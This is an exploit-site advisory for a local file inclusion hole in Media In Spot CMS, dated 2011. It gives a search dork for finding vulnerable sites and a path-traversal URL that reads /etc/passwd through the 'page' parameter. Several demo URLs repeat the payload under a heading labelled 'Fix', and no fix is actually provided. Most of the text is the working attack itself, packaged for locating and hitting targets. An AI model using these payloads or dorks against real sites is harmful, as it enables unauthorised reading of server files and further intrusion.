Media In Spot CMS Local File Inclusion Vulnerability

2011-05-16 17:15:03

#Name : Media In Spot LFI Vulnerability
#Date : May,16 2011
#Vendor Url :http:http://www.mediainspot.com/

#Dork:"
"Powred By Media In Spot""

#Author : wlhaan haker <iit[at]hotmail.com>


###############################################################################################################
Exploit:
http://server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

###############################################################################################################
Fix:

demo

http://site.com/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

http://site.com/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.